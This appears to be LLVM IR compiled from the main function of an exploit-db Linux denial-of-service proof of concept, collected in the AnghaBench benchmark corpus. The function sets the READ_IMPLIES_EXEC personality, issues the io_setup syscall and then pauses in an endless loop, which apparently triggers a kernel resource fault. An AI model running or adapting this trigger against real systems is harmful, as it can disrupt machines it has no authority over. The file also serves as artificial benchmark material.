; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_40419.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_40419.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@READ_IMPLIES_EXEC = common dso_local global i32 0, align 4
@__NR_io_setup = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [9 x i8] c"io_setup\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %3 = load i32, i32* @READ_IMPLIES_EXEC, align 4
  %4 = call i32 @personality(i32 %3)
  %5 = load i32, i32* @__NR_io_setup, align 4
  %6 = call i64 @syscall(i32 %5, i32 1, i32* %2)
  %7 = icmp ne i64 %6, 0
  br i1 %7, label %8, label %10

8:                                                ; preds = %0
  %9 = call i32 @err(i32 1, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str, i64 0, i64 0))
  br label %10

10:                                               ; preds = %8, %0
  br label %11

11:                                               ; preds = %10, %11
  %12 = call i32 (...) @pause()
  br label %11
}

declare dso_local i32 @personality(i32) #1

declare dso_local i64 @syscall(i32, i32, i32*) #1

declare dso_local i32 @err(i32, i8*) #1

declare dso_local i32 @pause(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
